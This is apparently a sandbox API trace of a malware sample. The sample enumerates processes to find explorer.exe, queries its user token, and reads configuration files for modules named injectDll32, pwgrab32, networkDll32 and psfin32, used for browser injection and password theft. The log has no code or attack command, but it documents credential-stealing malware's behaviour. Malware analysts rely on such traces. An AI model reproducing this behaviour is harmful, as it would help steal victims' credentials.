	[0232.697] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0232.698] lstrcmpW (lpString1="explorer.exe", lpString2="sppsvc.exe") returned -1
	[0232.698] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0232.699] lstrcmpW (lpString1="explorer.exe", lpString2="dwm.exe") returned 1
	[0232.699] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0232.700] lstrcmpW (lpString1="explorer.exe", lpString2="explorer.exe") returned 0
	[0232.700] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0232.701] lstrcmpW (lpString1="explorer.exe", lpString2="audiodg.exe") returned 1
	[0232.701] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0232.702] lstrcmpW (lpString1="explorer.exe", lpString2="shirts_cumshots_compaq.exe") returned -1
	[0232.702] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0232.703] lstrcmpW (lpString1="explorer.exe", lpString2="league.exe") returned -1
	[0232.703] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0232.703] lstrcmpW (lpString1="explorer.exe", lpString2="js_sound.exe") returned -1
	[0232.703] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0232.704] lstrcmpW (lpString1="explorer.exe", lpString2="beast-dry.exe") returned 1
	[0232.704] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0232.705] lstrcmpW (lpString1="explorer.exe", lpString2="forecastsgeographic.exe") returned -1
	[0232.705] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0232.722] lstrcmpW (lpString1="explorer.exe", lpString2="reno.exe") returned -1
	[0232.722] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0232.723] lstrcmpW (lpString1="explorer.exe", lpString2="specreformwear.exe") returned -1
	[0232.723] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0232.724] lstrcmpW (lpString1="explorer.exe", lpString2="rr_publications.exe") returned -1
	[0232.724] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0232.725] lstrcmpW (lpString1="explorer.exe", lpString2="solo.exe") returned -1
	[0232.725] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0232.726] lstrcmpW (lpString1="explorer.exe", lpString2="beam.exe") returned 1
	[0232.726] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0232.727] lstrcmpW (lpString1="explorer.exe", lpString2="configurations.exe") returned 1
	[0232.727] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0232.728] lstrcmpW (lpString1="explorer.exe", lpString2="fact-film-anticipated.exe") returned -1
	[0232.728] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0232.729] lstrcmpW (lpString1="explorer.exe", lpString2="wanting villages.exe") returned -1
	[0232.729] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0232.729] lstrcmpW (lpString1="explorer.exe", lpString2="engagementresearchersmonkey.exe") returned 1
	[0232.729] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0232.730] lstrcmpW (lpString1="explorer.exe", lpString2="surgical-marcus.exe") returned -1
	[0232.730] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0232.731] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0232.731] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0232.732] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0232.732] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0232.733] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0232.733] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0232.734] lstrcmpW (lpString1="explorer.exe", lpString2="tadiapce.exe") returned -1
	[0232.734] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.735] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.735] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.736] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.736] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.736] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.736] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.738] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.738] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0232.738] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0232.738] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0232.740] lstrcmpW (lpString1="explorer.exe", lpString2="dllhost.exe") returned 1
	[0232.740] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.741] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.741] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.741] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.742] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0232.742] CloseHandle (hObject=0x5d8) returned 1
	[0232.742] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7638
	[0232.742] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b75c0
	[0232.742] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311528
	[0232.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x61c) returned 0x5d8
	[0232.742] OpenProcessToken (in: ProcessHandle=0x5d8, DesiredAccess=0x8, TokenHandle=0x128c8c | out: TokenHandle=0x128c8c*=0x5f8) returned 1
	[0232.743] GetTokenInformation (in: TokenHandle=0x5f8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128c98 | out: TokenInformation=0x0, ReturnLength=0x128c98) returned 0
	[0232.743] GetLastError () returned 0x7a
	[0232.743] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5f18
	[0232.743] GetTokenInformation (in: TokenHandle=0x5f8, TokenInformationClass=0x1, TokenInformation=0x22a5f18, TokenInformationLength=0x24, ReturnLength=0x128c98 | out: TokenInformation=0x22a5f18, ReturnLength=0x128c98) returned 1
	[0232.743] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x22a5f20*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x128cb0, cchName=0x128c84, ReferencedDomainName=0x128a7c, cchReferencedDomainName=0x128c80, peUse=0x128c7c | out: Name="2XC7u663GxWc", cchName=0x128c84, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128c80, peUse=0x128c7c) returned 1
	[0232.743] CloseHandle (hObject=0x5f8) returned 1
	[0232.743] CloseHandle (hObject=0x5d8) returned 1
	[0232.743] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778668
	[0232.743] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7638) returned 1
	[0232.743] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778870
	[0232.743] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7638
	[0232.743] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311630
	[0232.743] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0232.743] lstrcmpiW (lpString1="pwgrab32", lpString2="pwgrab32") returned 0
	[0232.744] lstrcmpiW (lpString1="networkDll32", lpString2="pwgrab32") returned -1
	[0232.744] lstrcmpiW (lpString1="psfin32", lpString2="pwgrab32") returned -1
	[0232.744] lstrcmpiW (lpString1="shareDll32", lpString2="pwgrab32") returned 1
	[0232.744] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778870) returned 1
	[0232.744] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311630) returned 1
	[0232.744] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7638) returned 1
	[0232.744] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b75c0) returned 1
	[0232.744] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225b88
	[0232.744] GetExitCodeThread (in: hThread=0x13c, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0232.744] GetExitCodeThread (in: hThread=0x140, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0232.744] GetExitCodeThread (in: hThread=0x578, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0232.744] GetExitCodeThread (in: hThread=0x628, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0232.744] GetExitCodeThread (in: hThread=0x5e4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0232.744] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225b88) returned 1
	[0232.744] Sleep (dwMilliseconds=0x4e20) 
	[0232.784] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x72984aa0, dwHighDateTime=0x1d50a6a)) 
	[0232.784] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0232.784] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8
	[0232.785] GetFileTime (in: hFile=0x5d8, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.785] CloseHandle (hObject=0x5d8) returned 1
	[0232.785] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x72984aa0, dwHighDateTime=0x1d50a6a)) 
	[0232.785] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8
	[0232.785] GetFileTime (in: hFile=0x5d8, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.785] CloseHandle (hObject=0x5d8) returned 1
	[0232.785] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x72984aa0, dwHighDateTime=0x1d50a6a)) 
	[0232.785] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8
	[0232.785] GetFileTime (in: hFile=0x5d8, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5cee06e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.785] CloseHandle (hObject=0x5d8) returned 1
	[0232.785] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x72984aa0, dwHighDateTime=0x1d50a6a)) 
	[0232.785] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0232.786] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8
	[0232.786] GetFileTime (in: hFile=0x5d8, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6052dcc0, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.786] CloseHandle (hObject=0x5d8) returned 1
	[0232.786] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x72984aa0, dwHighDateTime=0x1d50a6a)) 
	[0232.786] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0232.786] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8
	[0232.786] GetFileTime (in: hFile=0x5d8, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.786] CloseHandle (hObject=0x5d8) returned 1
	[0232.786] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x72984aa0, dwHighDateTime=0x1d50a6a)) 
	[0232.786] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0232.786] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8
	[0232.786] GetFileTime (in: hFile=0x5d8, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.786] CloseHandle (hObject=0x5d8) returned 1
	[0232.786] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x72984aa0, dwHighDateTime=0x1d50a6a)) 
	[0232.786] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0232.786] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x129128, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0232.787] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0232.787] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70fa1b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b6a40
	[0232.787] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70fa1b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
